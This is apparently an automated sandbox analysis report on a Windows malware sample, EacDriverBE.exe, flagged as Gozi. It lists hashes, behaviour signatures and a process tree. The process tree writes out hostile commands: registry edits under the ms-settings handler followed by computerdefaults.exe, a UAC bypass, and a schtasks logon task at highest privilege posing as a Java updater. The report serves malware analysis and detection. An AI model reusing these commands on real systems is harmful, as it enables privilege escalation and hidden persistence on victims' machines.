Analysis
-
max time kernel
49s -
max time network
48s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
27-05-2024 16:05
Static task
static1
Behavioral task
behavioral1
Sample
EacDriverBE.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
obs.exe
Resource
win10-20240404-en
General
-
Target
EacDriverBE.exe
-
Size
11KB
-
MD5
c6b2c74b647dcbbea223c51925c5c7dd
-
SHA1
071fa2b1394d2c95553149fd5eb643e0291927b3
-
SHA256
c5f1d37d96ed0788783f626a376144f85887a182155fed3b637744d9d9215a22
-
SHA512
ff1d378751d2722c165293b1dbefccc9aad42cb653f20178bbcbbc3318d6da0592e9099b7030f268c7cd60bc3e782ed2d66ddbf485391596f659b1e4c3c47b6c
-
SSDEEP
192:5S8JnK2fj6JIFjsJwpVwP456gijoVIgMa42JjrUxF59ooFIda:5S92L5FIJw/wgAjE7MeJvYooFi
Malware Config
Extracted
gozi
Signatures
-
Executes dropped EXE 2 IoCs
Processes:
skn4f5g0.exeo0no53td.exepid process 3456 skn4f5g0.exe 2544 o0no53td.exe -
Loads dropped DLL 1 IoCs
Processes:
EacDriverBE.exepid process 600 EacDriverBE.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
Processes:
flow ioc 9 discord.com 1 raw.githubusercontent.com 2 raw.githubusercontent.com 8 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 11 checkip.amazonaws.com -
Drops file in Windows directory 2 IoCs
Processes:
taskmgr.exedescription ioc process File created C:\Windows\rescache\_merged\4183903823\2290032291.pri taskmgr.exe File created C:\Windows\rescache\_merged\1601268389\715946058.pri taskmgr.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry class 7 IoCs
Processes:
reg.exereg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" reg.exe Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\ms-settings\shell\open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\ms-settings\shell reg.exe Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\ms-settings\shell\open reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\ms-settings\shell\open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\consoledamage374.vbs" reg.exe Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\ms-settings\shell\open\command reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
EacDriverBE.exeskn4f5g0.exepid process 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 3456 skn4f5g0.exe 3456 skn4f5g0.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe 600 EacDriverBE.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3404 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
EacDriverBE.exeskn4f5g0.exeExplorer.EXEtaskmgr.exeo0no53td.exedescription pid process Token: SeDebugPrivilege 600 EacDriverBE.exe Token: SeDebugPrivilege 3456 skn4f5g0.exe Token: SeShutdownPrivilege 3404 Explorer.EXE Token: SeCreatePagefilePrivilege 3404 Explorer.EXE Token: SeShutdownPrivilege 3404 Explorer.EXE Token: SeCreatePagefilePrivilege 3404 Explorer.EXE Token: SeShutdownPrivilege 3404 Explorer.EXE Token: SeCreatePagefilePrivilege 3404 Explorer.EXE Token: SeShutdownPrivilege 3404 Explorer.EXE Token: SeCreatePagefilePrivilege 3404 Explorer.EXE Token: SeShutdownPrivilege 3404 Explorer.EXE Token: SeCreatePagefilePrivilege 3404 Explorer.EXE Token: SeShutdownPrivilege 3404 Explorer.EXE Token: SeCreatePagefilePrivilege 3404 Explorer.EXE Token: SeShutdownPrivilege 3404 Explorer.EXE Token: SeCreatePagefilePrivilege 3404 Explorer.EXE Token: SeShutdownPrivilege 3404 Explorer.EXE Token: SeCreatePagefilePrivilege 3404 Explorer.EXE Token: SeShutdownPrivilege 3404 Explorer.EXE Token: SeCreatePagefilePrivilege 3404 Explorer.EXE Token: SeDebugPrivilege 392 taskmgr.exe Token: SeSystemProfilePrivilege 392 taskmgr.exe Token: SeCreateGlobalPrivilege 392 taskmgr.exe Token: SeDebugPrivilege 2544 o0no53td.exe -
Suspicious use of FindShellTrayWindow 33 IoCs
Processes:
ComputerDefaults.exetaskmgr.exeExplorer.EXEpid process 4908 ComputerDefaults.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 3404 Explorer.EXE 3404 Explorer.EXE 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe -
Suspicious use of SendNotifyMessage 44 IoCs
Processes:
taskmgr.exeExplorer.EXEpid process 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 3404 Explorer.EXE 3404 Explorer.EXE 3404 Explorer.EXE 3404 Explorer.EXE 3404 Explorer.EXE 3404 Explorer.EXE 3404 Explorer.EXE 3404 Explorer.EXE 3404 Explorer.EXE 3404 Explorer.EXE 3404 Explorer.EXE 3404 Explorer.EXE 3404 Explorer.EXE 3404 Explorer.EXE 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe 392 taskmgr.exe -
Suspicious use of WriteProcessMemory 50 IoCs
Processes:
EacDriverBE.execmd.execmd.exeskn4f5g0.exeExplorer.EXEo0no53td.exedescription pid process target process PID 600 wrote to memory of 1940 600 EacDriverBE.exe reg.exe PID 600 wrote to memory of 1940 600 EacDriverBE.exe reg.exe PID 600 wrote to memory of 1940 600 EacDriverBE.exe reg.exe PID 600 wrote to memory of 752 600 EacDriverBE.exe reg.exe PID 600 wrote to memory of 752 600 EacDriverBE.exe reg.exe PID 600 wrote to memory of 752 600 EacDriverBE.exe reg.exe PID 600 wrote to memory of 3076 600 EacDriverBE.exe cmd.exe PID 600 wrote to memory of 3076 600 EacDriverBE.exe cmd.exe PID 600 wrote to memory of 3076 600 EacDriverBE.exe cmd.exe PID 3076 wrote to memory of 4908 3076 cmd.exe ComputerDefaults.exe PID 3076 wrote to memory of 4908 3076 cmd.exe ComputerDefaults.exe PID 3076 wrote to memory of 4908 3076 cmd.exe ComputerDefaults.exe PID 600 wrote to memory of 1900 600 EacDriverBE.exe cmd.exe PID 600 wrote to memory of 1900 600 EacDriverBE.exe cmd.exe PID 600 wrote to memory of 1900 600 EacDriverBE.exe cmd.exe PID 1900 wrote to memory of 2040 1900 cmd.exe schtasks.exe PID 1900 wrote to memory of 2040 1900 cmd.exe schtasks.exe PID 1900 wrote to memory of 2040 1900 cmd.exe schtasks.exe PID 600 wrote to memory of 3456 600 EacDriverBE.exe skn4f5g0.exe PID 600 wrote to memory of 3456 600 EacDriverBE.exe skn4f5g0.exe PID 3456 wrote to memory of 3404 3456 skn4f5g0.exe Explorer.EXE PID 3456 wrote to memory of 3404 3456 skn4f5g0.exe Explorer.EXE PID 3456 wrote to memory of 3404 3456 skn4f5g0.exe Explorer.EXE PID 3456 wrote to memory of 3404 3456 skn4f5g0.exe Explorer.EXE PID 3456 wrote to memory of 3404 3456 skn4f5g0.exe Explorer.EXE PID 3456 wrote to memory of 3404 3456 skn4f5g0.exe Explorer.EXE PID 3456 wrote to memory of 3404 3456 skn4f5g0.exe Explorer.EXE PID 3456 wrote to memory of 3404 3456 skn4f5g0.exe Explorer.EXE PID 3456 wrote to memory of 3404 3456 skn4f5g0.exe Explorer.EXE PID 3456 wrote to memory of 3404 3456 skn4f5g0.exe Explorer.EXE PID 3456 wrote to memory of 3404 3456 skn4f5g0.exe Explorer.EXE PID 3456 wrote to memory of 3404 3456 skn4f5g0.exe Explorer.EXE PID 3456 wrote to memory of 3404 3456 skn4f5g0.exe Explorer.EXE PID 3404 wrote to memory of 392 3404 Explorer.EXE taskmgr.exe PID 3404 wrote to memory of 392 3404 Explorer.EXE taskmgr.exe PID 600 wrote to memory of 2544 600 EacDriverBE.exe o0no53td.exe PID 600 wrote to memory of 2544 600 EacDriverBE.exe o0no53td.exe PID 2544 wrote to memory of 392 2544 o0no53td.exe taskmgr.exe PID 2544 wrote to memory of 392 2544 o0no53td.exe taskmgr.exe PID 2544 wrote to memory of 392 2544 o0no53td.exe taskmgr.exe PID 2544 wrote to memory of 392 2544 o0no53td.exe taskmgr.exe PID 2544 wrote to memory of 392 2544 o0no53td.exe taskmgr.exe PID 2544 wrote to memory of 392 2544 o0no53td.exe taskmgr.exe PID 2544 wrote to memory of 392 2544 o0no53td.exe taskmgr.exe PID 2544 wrote to memory of 392 2544 o0no53td.exe taskmgr.exe PID 2544 wrote to memory of 392 2544 o0no53td.exe taskmgr.exe PID 2544 wrote to memory of 392 2544 o0no53td.exe taskmgr.exe PID 2544 wrote to memory of 392 2544 o0no53td.exe taskmgr.exe PID 2544 wrote to memory of 392 2544 o0no53td.exe taskmgr.exe PID 2544 wrote to memory of 392 2544 o0no53td.exe taskmgr.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3404 -
C:\Users\Admin\AppData\Local\Temp\EacDriverBE.exe"C:\Users\Admin\AppData\Local\Temp\EacDriverBE.exe"2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:600 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\consoledamage374.vbs" /f3⤵
- Modifies registry class
PID:1940 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /v DelegateExecute /d "0" /f3⤵
- Modifies registry class
PID:752 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C computerdefaults.exe3⤵
- Suspicious use of WriteProcessMemory
PID:3076 -
C:\Windows\SysWOW64\ComputerDefaults.execomputerdefaults.exe4⤵
- Suspicious use of FindShellTrayWindow
PID:4908 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /SC ONLOGON /TN JavaAutoUpdateTask_wwf7vChHJBMBk7lWy050MX /TR "C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer\wwf7vChHJBMBk7lWy050MX.exe" /RL HIGHEST /IT3⤵
- Suspicious use of WriteProcessMemory
PID:1900 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /SC ONLOGON /TN JavaAutoUpdateTask_wwf7vChHJBMBk7lWy050MX /TR "C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer\wwf7vChHJBMBk7lWy050MX.exe" /RL HIGHEST /IT4⤵
- Creates scheduled task(s)
PID:2040 -
C:\Users\Admin\AppData\Local\Temp\skn4f5g0.exe"C:\Users\Admin\AppData\Local\Temp\skn4f5g0.exe" explorer.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3456 -
C:\Users\Admin\AppData\Local\Temp\o0no53td.exe"C:\Users\Admin\AppData\Local\Temp\o0no53td.exe" Taskmgr.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:392
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
124KB
MD5e898826598a138f86f2aa80c0830707a
SHA11e912a5671f7786cc077f83146a0484e5a78729c
SHA256df443ccf551470b3f9f7d92faf51b3b85ae206dd08da3b6390ce9a6039b7253a
SHA5126827068b8580822ded1fb8447bdb038d0e00633f5ef7f480a8cdeaab6928ac23022a0b7a925058e0926ce9b41a6c8c22a5692e074621b2fccdb7edd29a0d4cfb
-
Filesize
1.4MB
MD56f2fdecc48e7d72ca1eb7f17a97e59ad
SHA1fcbc8c4403e5c8194ee69158d7e70ee7dbd4c056
SHA25670e48ef5c14766f3601c97451b47859fddcbe7f237e1c5200cea8e7a7609d809
SHA512fea98a3d6fff1497551dc6583dd92798dcac764070a350fd381e856105a6411c94effd4b189b7a32608ff610422b8dbd6d93393c5da99ee66d4569d45191dc8b